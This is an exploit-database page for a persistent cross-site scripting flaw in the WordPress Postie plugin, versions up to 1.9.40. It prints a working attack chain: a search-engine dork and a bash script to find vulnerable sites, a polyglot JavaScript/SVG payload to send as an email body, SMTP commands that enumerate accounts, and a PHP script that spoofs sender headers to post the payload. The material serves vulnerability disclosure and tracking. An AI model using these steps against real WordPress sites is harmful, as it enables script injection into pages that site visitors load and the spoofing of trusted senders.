Vulners
Lucene search
WordPress Plugin Postie 1.9.40 - Persistent Cross-Site Scripting
| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
 | WordPress Postie 1.9.40 Plugin - Persistent Cross-Site Scripting Exploit | 16 Jan 202000:00 | – | zdt |
 | WordPress Postie plugin cross-site scripting vulnerability | 6 Jan 202000:00 | – | cnvd |
| WordPress Postie Cross-Site Scripting Vulnerability | 2 Jan 202000:00 | – | cnvd |
 | CVE-2019-20203 | 1 Jan 202021:59 | – | cve |
| CVE-2019-20204 | 1 Jan 202021:59 | – | cve |
 | CVE-2019-20203 | 1 Jan 202021:59 | – | cvelist |
| CVE-2019-20204 | 1 Jan 202021:59 | – | cvelist |
 | EUVD-2019-10757 | 7 Oct 202500:30 | – | euvd |
| EUVD-2019-10758 | 7 Oct 202500:30 | – | euvd |
 | WordPress Plugin Postie 1.9.40 - Persistent Cross-Site Scripting | 16 Jan 202000:00 | – | exploitpack |
10
# Exploit Title: WordPress Plugin Postie 1.9.40 - Persistent Cross-Site Scripting
# Google Dork: inurl:/wp-content/plugins/postie/readme.txt
# Date: 2020-01-15
# Exploit Author: V1n1v131r4
# Vendor Homepage: https://postieplugin.com/
# Software Link: https://wordpress.org/plugins/postie/#developers
# Version: <=1.9.40
# Tested on: Linux
# CVE : CVE-2019-20203, CVE-2019-20204
## Identifying WordPress Postie Plugin installation
#!/bin/bash if curl -s -o /dev/null -w "%{http_code}" http://<domain.com>/wp-content/plugins/postie/readme.txt | grep 200 > /dev/null; then echo "" echo "Postie installed!" else echo "" echo "Postie seems not to be installed" fi
## Performing persistent XSS using Polyglot JavaScript syntax with crafted SVG (CVE-2019-20204)
# the syntax below should go as email body
jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(You've been hacked)//'>
## Email to post on Postie
- Identifying the mail server
dig domain.com mx
- enumerating accounts via SMTP
telnet domain.com 587
EHLO buddy
mail from:<[email protected]>
rcpt to:<[email protected]>
vrfy [email protected]
- listing accounts via third party software
You can use these third party software and APIs to enumerate target email users:
- https://www.zerobounce.net
- https://tools.verifyemailaddress.io/
- https://hunter.io/email-verifier
## Spoofing with PHPMailer
<?php
/* CONFIGURE PHP IF NEEDED */
// ini_set("sendmail_from","$fromFull");
// ini_set("SMTP","mail.domain.com");
// ini_set('smtp_port',587);
// ini_set('username',"user");
// ini_set('password',"pass");
// COMPOSE
$to = '[email protected]';
$subject = 'Title of your post';
$message = 'You've been hacked :-)';
// BASIC HEADER
$headers = 'From: [email protected]' . "\r\n" .
'Reply-To: [email protected]' . "\r\n" .
'X-Mailer: PHP/' . phpversion();
// SEND AND SHOW MESSAGE
if (mail($to, $subject, $message, $headers)) echo $headers.'<h1>Mail sent!</h1>';
else echo '<h1>Something went wrong...</h1>';
// FULL HEADER
// $headers = "From: testsite < [email protected] >\n";
// $headers .= "Cc: testsite < [email protected] >\n";
// $headers .= "X-Sender: testsite < [email protected] >\n";
// $headers .= 'X-Mailer: PHP/' . phpversion();
// $headers .= "X-Priority: 1\n";
// $headers .= "Return-Path: [email protected]\n";
// $headers .= "MIME-Version: 1.0\r\n";
// $headers .= "Content-Type: text/html; charset=iso-8859-1\n";
?>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Jan 2020 00:00Current
5.6Medium risk
Vulners AI Score5.6
CVSS 25
CVSS 3.15.4
EPSS0.00878